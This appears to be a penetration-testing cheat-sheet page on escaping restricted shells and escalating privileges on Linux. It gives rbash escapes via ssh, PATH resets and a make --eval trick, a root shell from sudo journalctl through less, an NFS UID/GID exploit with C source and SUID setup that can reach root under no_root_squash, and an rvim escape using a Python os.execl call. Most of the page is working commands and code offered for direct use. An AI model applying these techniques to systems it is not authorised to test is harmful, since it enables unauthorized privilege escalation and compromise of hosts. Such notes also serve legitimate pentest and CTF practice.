Jailbreaks

Escaperbash

  • It's possible to do it directly connecting with ssh:

ssh -i priv_key drno@10.10.10.124 -t bash

  • Or directly changing the PATH:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

  • Is also possible by using make. First sets a variable COMMAND with the value /bin/bash:

 COMMAND='/bin/bash'

  • Then, execute make in silent mode (-s) and evaluates the string x: containing the shell:

make -s --eval=$'x:\n\t-'"$COMMAND"

  • Finish it up by fixing the PATH:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
sudo journalctlvialess

  • journalctrl will output to stdout if it can fit onto the current page, but into less if it can’t.

  • When invoked with sudo is possible to have code execution as root just by pressing ! in the less environment.

Escaping viaNFS UID/GIDManipulation

Prerequisites

  • NFS server must allow arbitrary UID/GID mappings (no_root_squash, no_all_squash, or similar).

  • Access to a writable directory on the NFS share.

  • Ability to execute compiled binaries on the NFS share.

Exploit
#include <stdlib.h>
#include <unistd.h>

int main() {
    setreuid(1000, 1000);
    setregid(1000, 1000);
    system("/bin/bash");
    return 0;
}
Compile the exploit:
gcc -static shell.c -o shell
Now just copy the binary to the NFS share with SUID and SGID permissions:
chmod ug+s /mnt/shell
Finally just execute it to become the user with 1000 permissions:
/var/nfsshare/shell

  • This same technique could be used to escalate privilege to root by using SUID and SGID of 0 if the NFS share is configured with the no_root_squash or no_all_squash options.

Escapervim

  • Run rvim:

sudo hijack example
sudo -u adm /usr/bin/rvim /var/www/html/jailuser/dev/jail.c
And spawn the shell
:py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
PreviousCommand InjectionNextBinary Exploitation - Linux

Last updated